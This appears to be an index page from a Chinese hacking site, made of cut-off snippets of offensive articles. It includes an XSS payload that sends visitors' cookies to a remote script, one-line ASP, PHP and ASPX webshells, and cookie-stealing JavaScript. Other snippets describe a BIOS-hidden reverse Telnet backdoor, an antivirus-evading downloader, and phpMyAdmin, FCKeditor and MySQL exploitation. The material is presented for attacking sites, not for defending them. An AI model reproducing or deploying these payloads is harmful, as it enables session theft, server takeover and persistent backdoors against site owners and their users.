该项目仅为实验性项目,主要目的是想隐藏一个Telnet后门在主板的BIOS内,并让其随着计算机系统及操作系统成功的运行起来。运行后能反向Telnet连接到指定的计算机接受控制。 项目涉及的相关知识及技...
asp php XSS获取cookie的代码
<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" wi...
一句话木马(asp,php) 总结篇
asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST);?> aspx一句话 <scri...
判断数据库web是否分离的技巧
得到客户端主机名: select host_name(); 得到服务端主机名: select @@servername; 结果一样就极有可能未分离,结果不一样就是分离的 点评: 在实际的渗透过程中,我...
利用windows自带功能做永不被查杀的下载者(超小体积)!
用windows自带功能做永不被查杀,超小体积的下载者! 利用windows自带功能做永不被查杀,超小体积的下载者! 今天自己搞出来个永不会被杀的下载者 好东西就要拿出来和大家分享,,, 把制作过程告...
mysql 读取文件的几种方式及应用
章出处:C.R.S.T 作者:sai52 blog:www.sai52.com 今天朋友问我如何在mysql下读取文件,把我问愣了,发现自己还是犯了不求甚解的毛病,因此特地查了下mysql使用手册。 ...
phpMyAdmin table参数SQL注入漏洞
影响版本: phpMyAdmin phpmyadmin 3.x phpMyAdmin phpMyAdmin 2.11.x 漏洞描述: BUGTRAQ ID: 32720 phpMyAdmin是用PHP...
FCKeditor JSP版漏洞
FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/conn...
linux下mysql 5.x得到root密码后的另外一种利用方式
Author: Sh@dow 刚才在卫生间蹲着的时候忽然想到这个问题,mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数...
asp+js 偷取Cookies源代码
偷取Cookie,通过以下脚本引入一个js,document.write("<script src=XX.js></script>"),然后js内容为: v...
